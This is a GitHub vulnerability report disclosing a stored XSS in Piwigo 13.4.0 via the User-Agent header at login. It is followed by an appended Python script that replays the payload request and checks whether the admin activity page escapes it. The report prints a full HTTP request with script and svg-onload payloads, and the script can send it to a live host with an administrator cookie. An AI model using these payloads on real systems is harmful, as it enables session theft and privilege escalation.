Piwigo-13.4.0-Stored XSS Vulnerability in User-Agent #1835

Closed
Sakura-501 opened this issue Dec 21, 2022 · 0 comments

@Sakura-501

Hello, I found a stored XSS vulnerability in Piwigo version 13.4.0.
Impact:
In this way, ordinary users can be promoted to administrator users.

Here are the complete attack steps:

  1. Register an ordinary user.

  2. Sign out.

  3. Send the login POST with Burp Suite and change the User-Agent header to the XSS payload. Here's an example.

POST /src/piwigo/identification.php HTTP/1.1
Host: 192.168.2.153
Content-Length: 98
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.2.153
Content-Type: application/x-www-form-urlencoded
User-Agent:  <script>alert(document.cookie);</script> (<svg+onload=alert(1)>) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.2.153/src/piwigo/identification.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: phavsz=1445x798x1.25; pwg_id=ocv8aqqvjkdcshuv99j8l3ctub; pwg_tags_per_page=100; pwg_album_manager_view=tile; PHPSESSID=pfjer613d8pnr8ou8uj458i837
Connection: close

username=w1nd&password=123456&remember_me=<svg+onload=alert(1)>&redirect=&login=%E6%8F%90%E4%BA%A4


  4. Finally, when the administrator user logs in and visits /admin.php?page=user_activity, the stored XSS will be triggered.


Please fix the vulnerability & let me know :).
Thank You!

@plegall plegall self-assigned this Dec 25, 2022
@plegall plegall added this to the 13.5.0 milestone Dec 25, 2022
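As an added example (not code from the report above and not Piwigo's own code), the following Python script packages the reproduction steps into something a tester can run and verify rather than reading screenshots: it builds the login POST with the payload in the User-Agent header, models the admin activity-page sink once without and once with output encoding, and classifies how a stored payload comes back in fetched HTML (raw, entity-encoded, or absent). The host, path, username and password are taken from the request in the report; the row-rendering function is a hypothetical model of the sink, not Piwigo's template, and the admin cookie name pwg_id is assumed from the captured request.

```python
"""Reproduce-and-verify helper for a stored XSS carried in the User-Agent header.

Added example; this is not code from the original report or from Piwigo.
Every host, path, cookie name and credential below is an assumption taken from
the request shown in the report (192.168.2.153, /src/piwigo/, user w1nd).
Run with no arguments to exercise the rendering model offline; pass a base URL,
username, password and optionally an admin pwg_id cookie value to send the
request for real (only against a system you are authorised to test).
"""
import html
import sys
import urllib.parse
import urllib.request

# Payload from the report, with the '+' of the URL-encoded body written as a space.
USER_AGENT_PAYLOAD = (
    "<script>alert(document.cookie);</script> (<svg onload=alert(1)>) "
    "Chrome/108.0.0.0 Safari/537.36"
)


def build_login_request(base_url, username, password, user_agent=USER_AGENT_PAYLOAD):
    """Build the login POST from the report. The payload travels only in the
    User-Agent header; the form fields carry ordinary values. Returns a urllib
    Request that has not been sent yet."""
    body = urllib.parse.urlencode({
        "username": username,
        "password": password,
        "remember_me": "on",  # the report also put a payload here; the UA is the sink
        "redirect": "",
        "login": "Submit",
    }).encode()
    req = urllib.request.Request(
        base_url.rstrip("/") + "/identification.php", data=body, method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    req.add_header("User-Agent", user_agent)
    return req


def render_activity_row(user_agent, escape_output):
    """Hypothetical model of one row of the admin user_activity page (not
    Piwigo's template). With escape_output=False the stored header lands in the
    markup verbatim, which is the bug; with True it is entity-encoded first."""
    shown = html.escape(user_agent, quote=True) if escape_output else user_agent
    return f'<td class="user-agent">{shown}</td>'


def classify_reflection(page_html, payload=USER_AGENT_PAYLOAD):
    """Decide how the stored payload came back in an admin page:
    'unescaped' (raw tag present, exploitable), 'escaped' (entity-encoded, with
    or without quote escaping) or 'absent' (not on this page at all)."""
    if payload in page_html:
        return "unescaped"
    if (html.escape(payload, quote=True) in page_html
            or html.escape(payload, quote=False) in page_html):
        return "escaped"
    return "absent"


def main(argv):
    if len(argv) < 4:
        # Offline demonstration: the same payload through both sink variants.
        for escaped in (False, True):
            row = render_activity_row(USER_AGENT_PAYLOAD, escaped)
            print(f"escape_output={escaped}: {classify_reflection(row)}")
        return 0
    base_url, user, pw = argv[1], argv[2], argv[3]
    admin_cookie = argv[4] if len(argv) > 4 else None
    # Step 3 of the report: log in with the payload in User-Agent.
    urllib.request.urlopen(build_login_request(base_url, user, pw)).read()
    if admin_cookie:
        # Step 4: fetch the activity page as the administrator and classify.
        req = urllib.request.Request(
            base_url.rstrip("/") + "/admin.php?page=user_activity")
        req.add_header("Cookie", "pwg_id=" + admin_cookie)
        page = urllib.request.urlopen(req).read().decode("utf-8", "replace")
        print("admin page:", classify_reflection(page))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run `python3 xss_ua_check.py` for the offline comparison, or `python3 xss_ua_check.py http://192.168.2.153/src/piwigo w1nd 123456 <admin pwg_id>` to send the login and then inspect the activity page with the administrator's session. A result of `escaped` on the live page is what a fixed build should produce; `unescaped` reproduces the report.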